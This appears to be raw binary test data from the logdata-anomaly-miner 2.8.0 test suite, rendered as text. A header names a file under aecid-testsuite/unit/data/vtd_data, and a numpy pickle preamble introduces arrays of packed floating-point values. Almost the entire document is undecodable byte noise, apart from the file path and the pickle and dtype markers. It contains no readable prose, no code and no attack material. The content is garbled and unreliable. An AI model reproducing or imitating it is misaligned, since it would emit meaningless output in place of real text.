G@5;L0Gd3ftG-.bG?$rG?I6;G?ЂnGX'Gr˜cGPNNG?WGvtEG?=5 G?lJG a\=G}7GكqGElGЖOX}:G?cNQ8G-O]fG뵁G?ggMaG?w^-WG?g AGh""+GyT$%G%+GIDG?xI :G?64'GŠZ$(G?.>G?E=hG?鳁XdG?ٔBRG 6TG?KhG?bXG GʖS(Gd}3}G^}G|١G?׈pCPG?UGQG?G_78d5)GKIЉG,UG?ҽI GsG?̟zG? wGcGۓjG?WiUtG*UV8GW?@w G K2GGG?/s G{GWG@MIf{G?G G?J]I6cG[D[G?H|CG?y5GoչrG/4 GS^ GLR PGM0GhG@ 1!GAYsv]Gy*`G۝cG[څ[jG2K½G?6G)QG@.IjG}~UAG G? G+wذG?LqG?-&WGH2G?o9uG6l)>IG?nʡG ޢG&HGʬG?C@$bG?$YG?Z[G?eGKɅG\;aG?MG@Y6Gb*\1}G%;g\G"$ZG?aUG?孆G?^НG͞+*rG?I'&G?PGt(_N1GHG?sd}G@G?zQa/GeݢG?o2#4a`G?DM'G6bG|G@G?%G5 tGͼ;SǰGbG %[Gx;`~G@=~0G-A+ё~G?ՄPG;ryGܤ-Gǿ]GmGGs !=G?Q%rG?G@WCG G?ar,G?'IuG Pt%G?ZxG?%G١ -GG?K˃Gî1G?WSJ|G?` G?y#үeG?9 eG?GUjG?^$1aG^-G?@+SxG?4Q G?[;G?oJGԵeYGGԓk GҽmG?^蟭iG?3$l#G?΀?G@KiG?֧FC{G?MGG?l/GtFGӌT GCN rG?\Ĺ]jG"pG?.-G?½GܝRGJCG?-JbG?IͮӔGޓL G?ǃ_:G #ۖGח G?<@G?|ұ8!G:d$G?IG?eG?0 WPUGӰ\ɞ)G?܈wG?BKG?"R[AG!G?ܢk=?G7BBGEG2@G?-BG?چ=s:GG1Gsd-1G?NUGGbϻG?ZѭG?`(G?j̞G?ũ6Gre#%G?kgu/&G&^G?dT!GF4d9G2 BG?䄹`G&GI ?!G?3d oK Gƈ!jުG}~LG[г G?ǃGboYG?~1eXG?ِ%,rG]4G?7%#^GC2.sG?tWrG z1^G?z#G?1bLG?ܤ&G?$|8G?70hG?RR pG?qoA]5G? :bFpG?zSQzG?&iG?P~G =GG皠٘#G?Тb😉G?@r!GMܢĬIG?2qmGߔ'7G<}G-CG?,GGS-G?pTG?=mG?̱?bG却RQiG@\FGsNsEGRD7Gϣ1G]"gGƶ?TG?`* fGrS2CG?:@GX}GlNG?pcGG?3fTG?kyօGbG1G?jG譧GAf~AG?i!:G l GU5ʼG?|G?EY'GPIG#&şGe\G?kyG?'!tG?§:Gȅg8G@0r G?1EGHOG+oG,x_G1/&Gxn'Gwd5Gю}Gx.G?%@G?L!z)G?㴬4qGZHCOGگG{GiG&wnG?[0GdG?t@0GX7HGAHlG- G?X {G?!ǝgG@ G?y٤oGp[G-DrG?/!G?m3Gp"orGH%sCG@&ujGi(G"\@G?1(OGܚo2G6G7qxG lG@lhiGnw/G7G 0G?MY+G]3/EGsGy VG?7;/dgG>D(G?0+}GhsG? "Q-G?ٺ1 TvGlʩG?]*\X G&GGERG?΃:!Gb G?9NGd>GG;BG?eMG?OG?t4GcrG?dG?plG?*{&G?Osj?GAYG29G?`rh͒G@CAG?!7kFG=b]G?S5GA<@G/4 GH!G?*$TXG?DEWGJGS@G?QG?j4Ғ G?ONG?zpG>*#G?HNW_I7GfJ_G?'T&G@>G: Gj+G4GS#GеtGstА/G?؜=G̎GEV!OGшG?Ѓ;+G?sG@4_#|G? f>-G?3,>GweGmN2G7EG?ֶ onGiECEG?y%XP\G?G'YG?6AnG?pG?lGQG?2GA4TݸGaG?#)iGO]G?:)$.G?,4G? U|AGA(G@tI2UG?H5EG; ݢG6o0G?pb?G聯`GqhQG?GJG?xF&bG?9Ҭw'G?d)ߑ+GrJG?N1KGR#G?YG?$)n~GlxhGGڬG?r'G?[@G6@2RvG?ޏ)G?ywGJ3RڎG?j567G?19qGkS IG?9$b̄G?t1G+G?`q|G?ֺ_J:G|hoGI)ߚG}#>BdG?k-G?=G?ٍ T}G?2G?+G--bG?9iGs``x*G?DG?3\^G?ĊBtG bG7TG?I G?cFMG/`Gpz:G?ʽzGCXLG@Y[FGGGiiCGvɱFG~1)xG?Rf=G?i_HG]~/G?D'ݎG?F&G?nhW)6aG@ߔe(G4WfG \G )GXچTGёR0yG?$"+nGޫG?Q}G? *G'G?hGdݩ9G)G%վcGaK_G]#G?9GtpG?XGvGGk۟(y5Gj#G?a~B G?wgKGnGdCG?%/GӚ92Ghx]G?ՊnN'Gw|nG?zu@G`'2ChG?`)2G?[3GڎEaGOdG? UuCGĂ4G?NPkGOG?LjR˥G?ngG>QG33rrG!G?NT:GG?]ڐG?nG֟I8rIG@_G:nN(G?%iGۥ@!GFFJGsG?+ 7}GG?$G?ᮢaG?IGЄVCG?L<%Gv6GQu#\GtzI;GfQG?,CG?,#G? G?ӿG&G?ɲsMG?7G?}1G?~h,́G̊ÛGwG?% gG?3"UG?UWSG%(^G?VG?ݎ]G?.:G?FzWG:֪GCG?[GԺGqyH]G@*}y\G&WތGQ4G?/zlwG?80iG?zmc{G?~8GӸOĀG|PG? LG?=8G?@G4~FGQ.]DG?''`G??G?(GH5FObrG' aG?GG?q_uG-3"GB@s^G,G?v0GG?BKہ3G?ܰyGHw[G?)/SG?2ng/G?ϙZ@G9G5ϳG G?C޷G?!voGi4:G?TG(EJG?{m~aG?9VGGѥ@GSJG?̇Gm$G֛hG?嶎$ G?ꝨfG?*}CG?ZMNG?LvgG?F"'GؙjDSGC~mKGuwG?Ԛ[,G?H.G3$ ^G]G Gs֌жGCG8_n:G?JI{G㊌G?y("=cGIօpG?iG@K2G?-GF7jG?[OG9GPG?܏GHYG?vѨG&Y'G+dr-G; G?G?lj9jG6XG?7LcGsG?0#"G?%AtgG`}Q3G?ހ G?@'7xG?CvG?E Gd:G?ȳG?\kG?>ޥRGڢpGw&DG?q,#|G?[_G@zG?ϙ86WG28G?*G?߄U5zG2;2uG-whG?gٲٖGPAM۪G?\gG@G?QGvAGrN ƍGcCsGBY|֣G?,,~ޫG-G9{sG? qm)8G&6G?F; GSFGV/9G?+ G?>BG?c[[SG?:NG?mq~G엎KG?ߏGQ@G?s!\QG?tlFAG?ߊj]G?/GOG̋İz7G?I9YG?3G??5dGHGhIG?o3GJ`kGm9uG?)sG?LJJGyn GQ]G.ŦeG?|G?!> G?UG?JeGpG?vyZG]@G?OM@G?iZG?8H$ tG8*GS|G¼so+gG GXF^$G?ЩGUa\G?gXG?#WGG?|]PG?GOOG?>+GJskG\G<3G?+NG+]ėGnܡOG?@lEG'G?u_-EG?EvG,G|2KBG?3gLGQtKG?^MG] 6G~D.eG?k4t&}GGj.4ɂGK=LG?J4ebG?󆃊w_G?2unG?ݨ1GYmG?ޠWkG=ϹK-GM]NGp*GG@P[]aG?<KG2k\.G?뭡@;7G@:~df6G?$/6G_ G? s[?&KG?r.CG?@zf]G?WSG=~G?iG|M(G?"A<G?@@G3 G?3k!b Gڄ.{GbǠCG^1VsG`BaGB'2G!IGeG?бlG*HG?pMI}G?qAIG@'G?ض tG黳ݩoG?~JWG?.?zG ƶ G?Rm#G p0wG?OsqG cG?3@G@j"G?I*G?dzORG?M']RG?ꎣ$4IG?9 FG?%krGh^GKnGws-G@N_G%% NG?ߞ+4G?bG;1ueuG?߀(G?Ҍ0'G?sYGߕEAG?ؓPFG.ȩ?TG?`R8G?T G?֓hGe8 G?Ϣs5GftG@I>>G^G?6G$AzGw\}5 G3G?:"GΈNG\c:pG?xGf "G?kzWGBG?3OG:o(p^G?&>*EG?ᘪsG?KGD6GxUGSӈ*YG?.AGνGȸG/ Gھ.JeG?ÃwܤG8ZaG+SˆG?| OG?$,G0_zSG?єyT G?ǿeAGu˨jm"G?HG_PG?4NϒG?5'G ݛ"GZ>G?FY_G?i@d)GiBAGĞRGGcG?'YG9G@S7&G?b|iG۝5G?R\G?dGٍԜ,GG։0Gq5G?G?ǴG)G?'0V^#G?jv"G?$G?xojG? {5G?_y SG^MG?Xt&G|PkG? $5tZG I,̬GAg"4G٢bŏG?BG?^ $G?[D8HG> GcKYG uעGļnG? ηgGη/G[y~G?ZuG?TF=G?4W*G5-ClG#vzGUG#شG?cGAbGkӑpG?ߦJxG?sW}4GG?!wrG?YE"G??<GǁcG*G?Z2aG?Mϛ,GΌG?qF5GGG>9 G?b<G?m Gո"~~G?kG?s sG?}e^G??GG8hdGsN6AG?'G?u dmG?]{Gve) G}G?X ^VG? ɎG?ȣSgHG.MnG*^%)G 'G?טoGbuӳG?jzG`g3G?ikXG?{:nGQG.FGTI[eG?A%G 4CG?@dG?3ӄ.G?%UG?zjt-GFAG% ޯNG?CG_AջJG?q^G?L fGY#/kG鿖FG?5吰XG?GFx~G+>GdyDGώGSD!G.5G?᤹dܰG?i}2?TG?Q WG⻲)NxG?P)2G?ʖYOG?Ӧ%GGءRGۦG YʪG zG=%G? ©AG+h! G?;-o1G 5GuG5ciG@XYGIgwG?Q;G@ RG? qG?LxG wz"G  ٙG  Gi/G?ݷ82G?;9~Gծ {G?6zG?7;QGG1G@6Rr۔2G_G?<#^G?fG~iG8rG6?ZGD񔁵G? {G?5ޫdGcBG?ĈsYGcڃ4G?پ=G?=W!GwގGRrGH㳉G80G?C4GT3可5GۄzqWG?YwG?e G?/GGتG?ԯQGxcXG?Ӗ8B%dTG?PG?Y\EG?LVkG?=QG_.UAGsyóG?xzq G?U4ǷG?7@bG?e;G? M%G}G?@wkG\9G:әڡG?O;\˄G?-u?G;\wG@ioGtG!MG?ZX1G?wJG?4;WiG*R&(G?厯˓GJ4ؓG?.6nGΎΊG?\GӌeGdw ]G?^{#G?zmRwG?ߴ pGT]rG?&pG?yG?G#-ZGx0G?;G𡉃{G?UeGms͊G,jG?E-[G?LP2 G? (G?Q G?46SG?^0G?IbGg.zڍG?DG?.^JG?F:@GhG?3aTG?Jg~2(Gp GŐ]AG?r2G?|GƉ9O&G?P@9G?نV}=cGBmG?ds.HG?!$.2&Gc`G?uבGSG!nLG?lGXY'ʬG?`%-G?vKG&G?5 /oG*GQ{G+ήG%MgBG?E|Gqd-GxL,;G&?bG;(hG?q G?­!epG?@H͛G::mG?烝G?O_G!()>G?_dG?2WG? nLG?PfK(DG?㻦)ԍG;nG.uG?tڔyG?GVG?ϴG? \2G?K/G뜾G{G?B4GnG?GGΒ pG~]G?v7G;?OG?꠼GE뛲G?KWG9ϣyG@Y:ąG?s_`GZ*?.GohG-C"(G԰>%G/dmNG?e`pvGٲ?G??#G@udtwG19,3GWR@G?`vjG?E -)GP4GYG?ƩG?vGvm~G?hG?E|mc.G?nG6-lQguGl;W_3(GiRG@^GDaVYG-/GG@,X*G?|G{tVGُm!ѵGs G]G [z!2PGu+GOG?d%\G?BXGGY])G?z$z}G?ϬGflTG_bqG?ﲯlXG@B'G?yTuaGjPG?Ѵ7n-G?ñH×G ЖG?KGSVGu G?1wG?x*G̥-,qGмެG?ӪoG?.uG?EUd*^GPF\GuG?)?PG?MG}{+(G?R^G?rFG?uiЊG?A2>fGQG?5&}#d(GG GYjGZ:UG?,~QG?{^%LG?{>G? G?+VޫnGݽ@xfG'dG?tB9G|{GPsG,Q*G?4rG̳U 3G?d)G!aRGcVȃGrАG?uG&VxG?0MG@GhjGӟDFUG?"qGYG?0Gz[G?[NG) G?w G԰HG߿0TtGwzg-G?yp/(G?% (G9G?4pFLG?,K G6zݥ1G <ǃGDG?LDݍG?YѭG?oX]G?qG?[E2G2g;IvG?^|X>G>M "DG?X!lGtGǖO^G?̿44GM3KGGRKZG?>[{i G?G?"ɿ~/GOրG?3yjG?'G?I9G?ozhG?fUGP1RIG,9G} G?Dž+vprG?ŒC=G*OG?6JcG?U%eG֕duYG6{GϘ"ihG?>GVG$EGHm;G+G}ܣG?vGЍGcG?ׁ!eGS*L?xG? zuGזCňOG?dG?uIG?`H)GvfG܂:IaGG?Sd&N}GQ qG? vX~9GTvWG?Xv-RGewkG0*G1@HG!sRGH$_G?섫|bG/IGz뱒'G?ֲB@)GROG CG;]NG}`G?aGMGmthoG?\G?ɌJ\6oGb2 )iG?@G?];BtG$?G?b} G2DG?)5KG<G?&;G#^piG?%..gG?e:_G?ZQ G?{"hG?&}GjٟG?J,p[G?ˬQhG.فNG?4F1GЋ+nG?Y1G@ ywUG?9G?W]lHGȶ.G?SQyGpkGճ[#lG/EG%2sG?fWG?k;G?SaGU&hG\nG@s^JGl|G?kqmG?ʫX'*G䷦8G'ƻ@G?dQGG@sO.U5GrkHۡoG?9G?XNAkG?(F4GȪ+&G?fG?ja~gG?/o=G?ӓioG# G@(G'FG?E1Gp$Gn]G*G7BG?jKEG?s[ b_GzGE.%eGlG?h nUGӮ51GgG9qG?Ӡ8ǏuGw4QG?Չ=G?;cG [G[BG?'áG ZGxPG?)W G?d|G?+3GGB{a=G?6EG?P "x/GL=DrGC$6OeGA?G? G,NG0G{GyQG7i$iGڅ\b *G?eH|VG:5Ba4G?VJG@hGˣ({2G?NJlwG?UGuZGdAJGJHrGbG7aG! 1G,/j];G?6=}[G?!lGMBRGwO54wG,k7+G@`x U]GXG[@JsGYlG?z02jaG,5Gi<^G?tGGz G4GG D !GG?nI@2GL.OzG?^G?jЋG?'HG1MG-ir@G?ZqdG?ǬG?_gG?(KGЀGȻuahG?A2G?GtG?<6G;9ƨG⢤TG\zaG?ҧe}YGy-G ʄG{iGsGƁk,G?Ny\G < G{dm-6eG?hG?긞.GZd}aG?i$GǚhG?4oGvTGF݃gG?uw'KGw1u'G?*idG@FBCG?MZ.G(fG?םtjG|LqG?^өG?ֈW;GvMeɊG?e.wI=GG?-\L-cG?tR G?)},ǷG@ٲ(oGlI8GF[G?{BvvG?2xGwG?,M*G{ljHGeo )G,uG?+ `G?;%YG鐪GVVGpIG啞SGC@tGj&G՟JG?4Gw'19G?T3 G?%7GY?G?$cG?GtGόHi$G}{0GE Gʣ}`aGI|ReG?)^eG?M=G0UG?EpqG?v,UGɥ:G^Ա~6GKG?̢GYG0G?RtQTG?X޾xG?ȁ[4xG?&GاX؀/GNr GWG@SAG?.-2}G?6yG U̟GG?IsG7bXG G?R^SGDm BGebgG?C`3vG/і4G?k,RpGз!R`1G?V5/G?ctG?,:؁G@Տ GbWnG_i\WGB GЄvG?ᗁNG?SFnG:G?Jc=8Gc*.G?f"B3+G;,`G?OpG?’wGArG5"N%AG?3lG-K"RG@q&G逧qOG?GnNG_7GfG?.2V9G?= G?l$G?ޣ8l3G? PG6$G?X&rG?(=G? +>KH6G?rWG>eG?3WGlG?d-bG*tMG&6FkG?탕ZGc89HGfTG?lT>G?.!GdㄯGuvvG֌ FlG? yG?{ݒ"DG?7rSG? CfwG?z7]G?ejG?ي;>G?RrCyGR"G?J{G?ЀT\G ˇUGڶ&Ge](e](ee.logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/vtd_data/spec_distribution_k000066400000000000000000000177371500476301700304640ustar00rootroot00000000000000cnumpy.core.multiarray _reconstruct qcnumpy ndarray qKqCbqqRq(KMqcnumpy dtype qXf8qKKq Rq (KẌ́g׼YNςV:im\P~7(n2?j#FQE!7g*3pWZcN%)nX ox.aІPjmrs@3TG|:̕!D oՎvG]XQPD9+Z.[* }oA}np-JXcW׮A=q\)1ᕇ$e*$|3 nppDcwW=fJY2G%B9 Q+[ p[s}f *ζ Z󿞮YeM/3@󿾷4Os斏;|+Hvԏm,2ie]q\ RP~C Z7򿞗[*Dj!`H|C Q%}epCNZbWo7Kr$>!@2yF%[ҫbvj4h RD܅4y/SpI8Uh,_:e>SrF,Bd'>񿍚L5H-~w[ nT2k Ϭ/wD];Q^\Q-sE o<3ȉ. ,#)\pvW52!|7s>{Bk;bԊ+VE-IyjA 8:Ns50𿚦Q'LV\Wۉ\? /q?P}"q=Ȋ d￾4R=Ԧ£}\|dWcᅢ{xRFYTA 3.0Ǻw￈kHh%.EJ X@Q&#wSk]Df4\RLSe93~"›wu U(LN*ِ'KىlFΛLe,?z^q1i_QXrG?6&D 0R g47'ۻX y쿨FeniG쿉l쿪 xlm>[.k_JF_9%-1 2.X뿶$v@vE7&Pfk)뿸R[HYd~ o뿼g+^}ALM=wLm<'+̮뿁 뿣Û12꿃L- SFqs^꿈@pւHIqjkX꿌RY?Mz. 4܇ a 꿎e:QF12S xRjF+Å鿗tXd}%S-YFB6@(@'k连^R :,~ZM迢d3nmyvw迤'֘fgrV(_K3EGF+i-ו*Lr翭bn^@<.:Zɰ4 3җzzSi翴3!-Xte H5@7Ea&翸33濺F}j&>ЩGh濿|Y\-5}濡6{[d?l K濄-:GsN)R:Mo)[! Id Mő忍vd4M'>U_vΈ6Hgr|MKU=忓.;,T@\v'N 忘XpSm!F!俛!A[3fb䪫>4j_x7P @W'/俣GH. O㿦Y(f|(- '.㿩lOj?fp㿌H!m㿮QSnB/2cM~5!m43v &`⿴פt69.orH<⿸!]٣gpV⿼]ʆE|`5>S9"$_: !ńAf3wP֖IǦj{ῇWGjIhY AHi7ῊZ'Ῥ#A: ,(q࿏lYO2? 2HQTQė6 qW~ղMJxm࿕c#\࿷lyiJCu`)࿚&Za=6]v߿z"+߿4߿A@g߿ F߿FYF$߿kc1޿}1 ޿LߺoM޿@D"{޿QY޿W8޿Ue9T޿iݿ7xݿ\[ݿLmݿ`iKݿ *ݿ#"pܿg4>3ܿ&ܿkPhܿXJ_ܿ-k -ܿq}vboۿۿv@ۿz4ۿ8bۿ|Ʈ/ۿ'8D;ۿ|ڿJڿC5!ڿeڿqpsCڿ%"ڿ 4HڿNFQdٿX ٿOyٿ2UWٿ}5ٿY5ٿWؿٮؿdjؿ#6]kؿd¿8ؿN"ؿ]ڄ׿.,f׿p)׿2>j]׿3};׿E  ׿9XdqֿGֿ=wֿ|6qֿ8>ֿD ֿ&w=տHd)տ8տ h#tտOAտK^տSX Կq KԿ!?ԿZ3 #wԿ۔QUԿ^3ԿW:Կ#jw7ӿe|ERӿyӿi_Gӿnk%ӿcӿr}$ҿK ҿ|ҿxKK+[ҿ,l9ҿ}ҿ <ѿ3RsѿDE TѿW8Mѿ wz+ѿE ѿ |пOX`п&Âпaпc9tF?п&п!eϿ<ӽ|pϿY_ ϿG$οIbοPv+οRe.ۮͿډsvͿ]f 9Ϳ"̿h9F̿jF̿q}ʿ˿s@hM|˿ds˿~ױʿL"Znʿ5b*ʿGaɿ &ɿɿ@ȿd%vRȿ'ˊȿ|ǿTǿ1Ҍl"ǿ(ƿ7śOXƿ?aſtſņ}lſʈ(ſR5cĿ)^Ŀ]m)ÿ Aÿ6Pÿ/ ÿcBp=¿sއd¿zQ4O?ib_&4!ſ8GZ>>YVtN੽^j߼d4(hMv@szƘu ѤX 븿A y22V3a|F[M:͈5%T[Z,WaMo}̱2< |t 8&Y0ۮ.=ͭJ=KR:Xh@0m~d򦿪K]mȣ3Ng瞠~~'7-ܙ[@I!qlew1R}s8bYja;X?YRm?K' w??g~?W%?.c@k?kcPc_???o|?S?,+ݚ?o?HWul?({X-?3D£?#/W?_?h ?7?Ѣ?XaDު???o4Ԯ?-ч4?"OeF??6ɱ? 2?ק^?cn)?6y?I ?Ո??R?Tj?p/c? (]+?d]V?.|?sAG?;з?}@-ܼ?rq?gBq?\eZ;?)r?tZ=h?Bx?<+2?|?W(?3hcb?̞?/,?uœ?O?j|[n\?WV?_3#?'?';?Tv?NV?I?|&!?>Xza?3ޙ?3BP?j?( SM?m;?}#?X5 J?48?s?`Ůz?ĭ?($E?t}~_?Xf?i4TOt?7?^ K???S ?}Gn?HY6?aո?9IVO?uk?c1?WQϥ.???,3iL?e?Lv? A?^?,|I??/U?x?5v&F?cX-y?Q˫?l?th?)-? ]C?R@v?aEި?䵹{?-?@?VKTs?ш?vr, ?Jd=? RE[gp??w?-C??۷?? ,:?>zm?xp?4Ң?q7?l8j?)jY+?v?dAf?aR5?@2*g?-d>??2?+od?]Q?KW?ˌ?ƛ?*/?%a?d?R?x@=,?4.^?Qmx? ?mU?>[?J?a|&)??ۉd&?wY?VeD?@?.Sw#?K V? >|?%Pm?G'ܮ?4y?? ?4BZ#?L|??m0?Zl?Q&?Hk???v6-U .?U-FXG?4$_ɦ`?=D??±?k0?k%?J ??TkD?X]?Ŀqw?W?`??հC?j?%?v9~A?mRSZ?wdk t?3R?I;??V?-j ?$$C%?l3ޑ>?( eR/q?~ ~??:j?a ??iV"?ET?ۭ^Bn? ?w.?49?w?d&h8?[?"R?jIq?)7 B?.Đ?8.?|?_9gO?j۷?ۜOU?ҵ ?w}A?32?Kf|e?}?lwN?Jn?\|?I,@I?7^e{??%{?M??V>_?pd@??L{?K*?Qv?nc?_\??~ @\,@>R@W)l@|@%e@\vd@QZ@@P@+FC@<%QY@;

UUU6G(rXG+ީG?9T\G#EG?ޚzG4ĶF0G?/dG?H8G㢖68G?zR~~G(5sG?$G?IjKGܳG?HG?D%gGhuG?1ОG?D1MtG*cuG4lG?LtG?˭qKG?,Q ,Gīˢ:Gmb/G?6UNG?[`gGG?#cGę+0G @G?uG}!DG?UG?b;%\GJ{G?$zOG? ŞTG?snGc()G?Բ\G?oUү GoYGG?]VG?'Ew2G? `.IQTG?^f$GNG| dG?Ģk ҙG?s8\mG?cuX2\G?@G?ӗGɈwGGӽ3t#XG?5R"G?#FG?Q gOPGKG S0G?ĺG?GZ8G? =VG?w_rG?NXĄGҦ&͂Gv]EGoW@,G?U6gdNGݓ|f~GjbzGSLl GՅ/+cG} EΨG?`&]:G?߄HGAu?zG?i# (G?,I*G?lA@G?NG?ɥw}KGftG?Į:GLrPG?g}ҲGDG?ғьG?X(z6Gֺ{GG?ux`JGԁ\G뮢a(G?ڑG}G?(>#)G*ѳTG?}gPG?_DG?3]wG?sFG?ώwT(GcU@Gd20XG?Gt-zGL*m{G?\\6CZG?xxfG?0( GJ@(G?ḿ( mlG`lG&Ç5̺G EGS;0GxQG?)_W6GɈ\PGdt=GRTG?RG,~G?>#x3bG?vG?Ꭲ&GEt[ GĐ(G?\ G_ G?3yG= @G?;:G?zV*6G?̤A4P|G6G?[G!dGK53iGσ;G?FDG?$&CŔGBli?rGrW$G?кjM{G?'C/\G+0.7.Gp[7G ŔAG?\IjG?ÞLG?ТGHDG? rpTGPB`GMGo+XG?ЁG?}PGª2hG?;yPG7cG?M4 ;`G=]fsv(G@֩G 0G?M}͵G?ϧ[G#0+GO'3G?_VG?)dG?件gG?uG?0I(G?g(GsdGڊG?җ[VG? 8DTG6[u atG?rhG|dTGݧقG?(4G?&1 G?H_RG?Y G?$GG?[8>.G~8G @QyG@vG?XIVG?GI4ԤG?3U4G?jInG^'GNMGTG?rtGŀYB8G֤dopG?ledG?ߩtG?FNqG?Џ@!G?\ 9 Gpk.G~mfMG?1&%GnvG?0G?tКGl?as@G0fG?#OxGB X`G?sųG?KzXG?U[G]ƁG֒&<GsG[9oGʈG/\GgRhG viG?Ff@G?VG?hMˆ5G֔gTG?]^PG٦zGԂE8GncGG" G[GuW6.G?&t{RG??NNG?UpG?-PG?a gwGֻJ\G&gG?TrG6)JGcIG? G?eGwF`G?!wގG?=G?D1V:G#1: GijRLG?ՙhwG?vG2K%sG?"xG;9;G?V0GԺ|G֠$ G?15hG?M/S_GЛ(UG?#G8,TUG,0G?S`G#[$G?:dG?߉HKGVGWCwGѵq0G? ]hG!DLPG?͊ G?Ҕq$G?9DG?:Rh6Gzl%G?kFTG?ﳞG?YӀA8G?ED G?_uIDG?Щ>GylG? 1 G?3lG?8 @UG?u8G?(G?HMG? |xG? ]&kG6@G?KꂭG ɔ G?꽱))aGž;G.EG|uuNG?sQ;tG?h=kHGȿG?>5XG? vʀDGUnG?ڌE*GT7PG˲ϞGٹa`xG dRG;@odG'3G veTG?m*NGnG?UXG?ொG?߶{\G!KdG?&~G%G?(|$rG?eOn(TG?IuG?^GؕEuGռQ G?MJG?`\lXG?zHGĎKG?&)ǮGJk G?qlHGض.#DGc@tGsVKhG5tG}vG?i G?0G?[*G?{%XcG?.G?2 !G_lG?wb VGueG?tʔGፗ:G?&G?г̒1\G :ʁGQ `G?֯UU$Gҗ()Gޜ*G?zG?re>@G_RG?@GxkG?mj1nG*G`ў$G^G?vKGQw?Gy)G?V@G ?jG? U.HG&GH4ěVG?- G|Gxe G?f2G,vG6GSaiG? |G?+(GAnpG?cǝGHGdԸG?T]GdG.I1GXGS/PG?XG.DGZWĠG:lG.G?d;nGMB_rG?{-YGX|g.YG?y˜G~b GW!dXG?qq%G?eeJvG7? :G G@G?ҡ GfG?(7sGN G?jӍ{*G?4G!G?]G?kG7$HG?;G?VGײa+G?2ge(G?^$G?lIJGJXG5wG?R\ GG;TN@G,0G) ,G?ߌc<:TGA!G?.#GoAǂ 8G?)kG?ͬ[yG?vָ(G?uG? ӇEG?3GT3 G?Hn}G1GG,OGyZlG?_M?G?X6A6VG?(\cKG @GG? G?0®GG?ܒ#:0GN@G?~S~G?S&A8G?ҫgGM]G?ff <_LG?"+vHG1c@G?-4G8`G?!"aGvϤdG? 3 G??DG? GyȾ#GY @GɒGRȨ8G?@[EG?|9G?ςqa`G?`G?狅PG?#GgG?F"`G?O٠%G>VGc- G?V`G?@ G?@*.&Gv/`Gk3G%Gb +{5GkjsbG?ыG?)xTG{kG?G5nGyMG%-G?젽PG?j+G?㏄ dD0G\5Gfu >G姖閠G?MH=G҆CP˔G?3%ݘG?u.NtG?iXG? l, tG?/5HG3w G"<G$w}GOIGvBD@G??"*G؀,GУ=+ xG?m:IG?~0G8@G?OhGcpG2G?a^UG޺GQ8vGOCG?l@=TG?{G?=H*G?J)6LG՘3hGi@G?d8o`Gd"Խ`G?hG?1O4G|3YG?QG?ʽlxG?΢KHGJ4ѠGȈ*GpG?VA#G.DG G?ke`,G?LG?sE~G% G?H/G?lG?( >:G?/%tG&G?sG?m|E G?伳/G?〲XG?ԕw\G?ݏl$xlG%JG* CjG? :J@GNG?g&5GZ-@G]G،zƄG?YK>G?♓G?OXkGJGX%G?ZyG?c;_KAG? tGHs2G =G0$ G׸~\!G? R]G-XrRG޷9A@G?ŸKLGrG'cG?a4/lG?hOxHG?_<8G?ٔ~'GLXG?FF G? Nc"Gɢ>|@GF nG?Н0Tz%GpfdG?s" G?) z^G?)bG?K8G?OFG?Y[%a4GXlG[rn G=|G? ` G?ã9nGj! G%BȐGN7G?9+0G?[(G? `GxG?ꍘd*G?v pG?–8G?yF`fG?LdG?wG?ԠyDG?\-ͰG;G?ŠzĠGLG?Am&0G?&jG{GN#v0G?E>`RG?i(G? G7Gj[G?ZLGn~eBGXFG5n7gG?^wtG?kYG?f`,G?s-GG?^G?[m ;GIrC?G?"G*BbG58bˈG|ڴXGL> `GH_Gp*ҜG꿞lG?ЯG?|G?l rG?1G̞0G?IGT FG%t" iG?4XG?8B/5FG:/؊|G?⁆gG?WlrG? G?e:G֥4Gq,G?AzG?ƬiWXG)+GU.GdG3G?̔^Y,G?ʂy1G?܇~G?o'Gj:X8G?JG4Gou@G? ^G?ԽGڛ ڄ!$GYd}G?I{|G?h(4G? 2G0BG?ف/\@G5G= GG?EG?[dG?Q<#Gg @NG--G?ߨ,G9)b`G?OYG稀2GӘuG? ֩EG?7G?×^<*G?CLsvG>SG׳ Gxn8%G?|GVuGتiG?#"pGk6bG#割`G+ʼG?z2(G7JVOGN;a*G / G?Ha-G?GV!BeG?'~@G?DGUxdkG?(=pNG?3"+GlG?܆,"G?NG?V:G?M64|GM6.G?v ^GJGctGs4G則%G+(S|eTG?[9G?u`G+G?b+VPG?GEGk;0G?T"G?3A5%0G?1\G?NaRG?u1OG?覮ƯGJ\8PGl pG?ª G?-qG?UBNG?V>\G?ݷɦG EȭG&GeeQ G3``GI!lG?&-\G?&G32G@PGb5G(f"G?s".G?ߍ-~PG?k^}rG?pe`G?5RhOG)RGG'暡G^GGŠG?ǠGg!`>G?%WFG?=G?ӻ juG?{hźG?B5GAGΙcpG?èG?5MGvzGAGߥ0G6kGR6G?սŅDG?5S Gْ[WG?lًG=24LGO_|`G?)YxG{sG?6˾G?຋7G?K*GSi/ `G?9NGŸXGGGrhG?vGG?m-G?QhG,DG yWdG?rGئGRyGTB>G?yG?VG?K4nG?r.YEKG?G<G?⌉uG3s xG?xgȐG?r0G?G?ADR:GhJFG?aHvG?!)wG?ĶMTf8Gop$`G? 6v~G?Ҧ'G#xN(GࠝY G?+`|G?) BGxw[G?SeCG?=UvGr(eG;4xG? BNPG 5ŨGd7 PGwKXG?ȀVEGA$5АG?|VoJGǩjGTJN\G?G&zGX|ŸG?SMDG?7V{ DGZtG?nA5 GN G?c*%G?#݀G?GDgÖG?ɢa`G?_1G?KG5T5G?y@GxCJ5^G?W~HG?>Gƕ9lMhG8GߩN5)G@G v"G?jkϧxGb=Gɖ:7 GtPG?ꤛG?-TG[LGDG~cSnG?AxWlGຩG?ۙ;'G遵mVG?wkNPG?0c'@G?G礶ʀGŗl3G5^2G/&GLMG?[4G ;`Gp$ru#G?#G8G? Q GyYz7G$⻬G?F=,8GdG?*G?AG?xuG?ٌkxG}G猔z[G?S,vGԂG?}TzG?&rBG?*()xG?;G?,;G˭T@G?DG?Cxu@G|"#(Gy0Gj-"G?wO}GnG֫5Z@GΉXUPG?Y#GGWyG綒#G?(ЅUjG?B%A{eLGaNPM4G? dP*G?QAf2G?7=ZeG??_Gź}UpG܍>GsG?Sk:G?5DvØG?w͛,G?P[GtG#^G?[cGP 